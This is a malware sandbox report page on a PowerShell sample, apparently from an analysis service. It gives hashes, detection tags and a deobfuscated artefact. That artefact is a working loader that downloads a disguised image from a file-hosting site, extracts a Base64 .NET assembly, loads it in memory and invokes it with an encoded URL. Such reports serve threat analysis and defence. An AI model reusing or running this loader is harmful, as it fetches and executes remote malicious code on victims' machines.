Malicious
Malicious

2e6e2f37187fc0cf8ac73501b02a613b

PowerShell
|
MD5: 2e6e2f37187fc0cf8ac73501b02a613b
|
Size: 20.28 KB
|
application/x-powershell

PowerShell
Powershell: Hidden Execution
Contains Base64 Block
Base64 Block
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules25
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
2e6e2f37187fc0cf8ac73501b02a613b
Sha1
8931c4cba2ff3bd29281ee86ddb3f62772d63149
Sha256
ace00c4aa0c763c44c1821d87307262587d88aa3446bbff35c8816eb4a340623
Sha384
aa8dbd309ce349e28d635753681be50413bbe08495b85b8dad136cdc454df86fd5b589efdb0b83ae7358210d5c417f18
Sha512
0f7ebdeec48cdbdc0f4d0a26a7d8f4aaaad4833a233115cff5df2197e8b45619f9b653058a836fa4d1b9a094e672a6486d793e12322607928c407a14391ffe76
SSDeep
384:pjtP2z+UZX6qkPmgAAGUQLiYtq3jgPoI74s/xz5+xpe2ibYWIDajrUmFyjF8Kbgg:pjR2z+UZXzkRAAGUQLiYw3j+rUmFyjFF
TLSH
34920D4E5D03043289332F3E5F17544AEF6B052789298A40BFCCCAA5AFB565183B9F6D
File Structure
2e6e2f37187fc0cf8ac73501b02a613b
PowerShell
Powershell: Hidden Execution
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://files.catbox.moe/hejh36.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=kzNihjZxIDOxkzMy0yM5QGOtEDMzQTLlJ2M50SMzUDNzQzYm1jblt2b0ZSYpRWZt1DdsF2P0hHdukXe55Wa69ybvAHch5SZnFmcvR3clNXYiVmcpZmL2IzMkJWL0NWZq9mcw9iYvAjdv02bj5ycpBXYlx2Zv92ZuU2ZhJ3b0NXZzFmYlJXam9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "bifanged", "js", "", "", "lotong", "2", "") } ))
2e6e2f37187fc0cf8ac73501b02a613b (20.28 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙